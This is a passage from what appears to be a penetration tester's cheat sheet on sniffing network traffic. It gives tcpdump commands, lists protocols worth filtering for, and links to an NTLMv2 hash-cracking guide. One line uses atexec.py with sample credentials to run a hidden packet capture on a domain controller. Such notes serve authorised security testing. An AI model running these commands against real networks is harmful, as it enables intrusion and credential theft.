Sniff Traffic

tcpdump

• http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/home

Linux (while connected via SSH):

$ sudo tcpdump -i eth0 -w dump.pcap -s0 'not tcp port 22' &

Windows:

$ wget 'http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/raw/tcpdump.exe?name=2e3d4d01fa597e1f50ba3ead8f18b8eeacb83812'
$ atexec.py -silentcommand megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 'C:\Windows\Temp\tcpdump.exe -G 1800 -W 1 -i 0.0.0.0 -w C:\Windows\Temp\capture.pcap'
$ sleep 30m

Wireshark

• https://wiki.wireshark.org/CaptureSetup/CapturePrivileges

• https://research.801labs.org/cracking-an-ntlmv2-hash/

Filters

Protocols to consider:

• DTP (Dynamic Trunking Protocol)

• OSPF (Open Shortest Path First)

• SSDP (Simple Service Discovery Protocol)

• ARP (Address Resolution Protocol)

• LLMNR (Link-Local Multicast Name Resolution)

• NBNS (NetBIOS Name Service)

• mDNS (Multicast DNS)

• ICMPv6 (Internet Control Message Protocol version 6)

• DHCPv6 (Dynamic Host Configuration Protocol version 6)

Scapy

• https://gist.github.com/Dfte/9cfeb87892557fd098de78f68b1b1390

Passively detect live subnets: